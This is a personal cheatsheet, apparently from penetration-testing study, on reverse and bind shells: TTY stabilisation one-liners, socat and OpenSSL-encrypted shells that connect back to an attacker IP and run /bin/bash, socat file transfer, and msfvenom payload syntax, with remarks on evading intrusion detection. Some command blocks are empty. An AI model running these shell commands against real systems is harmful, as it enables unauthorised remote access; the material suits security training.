Shell101

My Cheatsheet about Shells

The two kind of shells

Reverse Shells

Target executes code that connects back to the attacking machine. The attacking machine must have a listener running (e.g. netcat).

Reverse Shells are more likely to get around a Firewall than Bind Shells.

Bind Shells

Code gets executed on the target in order to start a listener on that machine. The attacking machine than connects to the target machhine.


Shell Stabilisation

Technique 1

0python3 -c "import pty;pty.spawn('/bin/bash')" 
1
2python -c "import pty;pty.spawn('/bin/bash')"

depending on whether Python 2.x or 3.x is installed on the system.

export TERM=xterm (enables commands like clear).

Background the Shell using CTRL+Z and type in: stty raw -echo; fg

That gives access to the tab complete fucntion, the arrow keys and CTRL+C will stop a program on the target machine instead of killing the shell.

(In case the shell dies you have to type reset as echo is turned of locally)

Technique 2

Instead of starting a listener with nc -lvnp <PORT>, start it with rlwrap nc -lvnp <PORT>.

rlwrap isn't installed by default on most distros (including Kali or Parrot).

This provides the functionality of tab complete and the arrow keys; in order to enable CTRL+C for the target machine check Technique 1.

Technique 3

This is more an alternative than a technique. Instead of using netcat or combining netcat with rlwrap it is also possible to use a completely different software: socat.

Socat is especially useful for Linux Shells as it makes them much more stable (not really on Windows).

Just like rlwrap this often does not come pre-installed with an operating system and you have to be able to execute socat on both machines.


TTY Shells

/bin/bash can also be replaced with other shells like /bin/sh

0python -c "import pty;pty.spawn('/bin/bash')"
1python3 -c "import pty;pty.spawn('/bin/bash')"

0echo os.system('/bin/bash')
1
2/bin/bash -i

0perl -e 'exec "/bin/bash";'
1perl: exec "/bin/bash";

0ruby exec "/bin/bash"

0lua: os.execute("/bin/bash")

Inside vi(m):

Inside nmap interactive mode:

Misc

You can use stty rows <num> and stty cols <num> to adjust the registered width and height. This can be useful for using software like text editors.


Socat

Socat Reverse Shell

On your local machine start a listener with: socat TCP-L:<PORT> -

On the attacked machine use the following command to connect back:

Socat Bind Shell

On the attacked machine use the following command to start a listener:

On the attacking machine use the following command to connect: socat TCP:<IP>:<PORT> -

Socat File Transfer

Machine that's providing the file: socat TCP-L:443,fork file:<FILENAME>

Machine retrieving the file: socat TCP:<IP>:<PORT> file:<OUTPUT_NAME>,create

Socat Encrypted Shell

Encrypted shells are usefull as they are able to bypass an Intrusion Detection System (short: IDS).

The "TCP" keyword gets replaced with "OPENSSL".

  1. Generate a certificate that is used for the encryption: openssl req -newkey rsa:2048 -nodes -keyout shell.key -x509 -days 300 -out shell.crt
  2. Merge the two files (shell.key & shell.crt): cat shell.key shell.crt > shell.pem

Reverse Shell

  1. Set up a listener (Attacking machine): socat OPENSSL-LISTEN:<PORT>,cert=shell.pem,verify=0 -
    • verify=0 is used so that the certificate does not get validated
  2. Connect back (Target machine): socat OPENSSL:<IP>:<PORT>,verify=0 EXEC:"/bin/bash", add ,pty,stderr,sigint,setsid,sane to make the shell more stable

Bind Shell

In order to get a Bind Shell it is necessary that the certificate (the pem file) got transfered onto the target machine first.

  1. Set up a listener (Target machine): socat OPENSSL-LISTEN:<PORT>,cert=shell.pem,verify=0 EXEC:"/bin/bash", add ,pty,stderr,sigint,setsid,sane to make it more stable.
  2. Connect back (Attacking machine): socat OPENSSL:<IP>:<PORT>,verify=0 -

msfvenom

msfvenom is part of the metasploit framework and is able to generate code for bind and reverse shells. It can generate payloads in various formags like .exe, .asp, .aspx, .war, .py, .php, and so on.

Standard syntax: msfvenom -p <PAYLOAD> <OPTIONS>

The most important options are:

Other useful options are:

The <PAYLOAD> can be devided into the following parts: <OS>/<ARCH>/<PAYLOAD>, e.g. linux/x86/shell_reverse_tcp. Windows 32bit is an exception, there it is only: windows/shell_reverse_tcp and not windows/x86/shell_reverse_tcp.

All payloads can be listed with: msfvenom --list payloads

If the payload is denoted with an underscore (_) it is a stageless one. (Staged equivalent: shell/reverse_tcp, these are denoted with a slash (/))

Anoter example:

What are staged and stageless payloads after all?

Staged

Payloads are sent in multiple parts, the stager and the actual payload. The stager gets sent first and then downloads the actual (bigger) payload and executes it.

These payloads often require the multi/handler of metasploit.

Stageless

These are the common payloads though they are easier to detect. Compared to staged payloads these get sent in one part and executed fully right away.


Places to look after you got a shell

Shells are always less stable than a SSH session, if possible try to switch to that e.g. by finding private keys.

Linux

Windows

Additional Information

You can find a Reverse Shell Cheatsheet on my GitHub repository: here as well as some useful binaries without dependencies.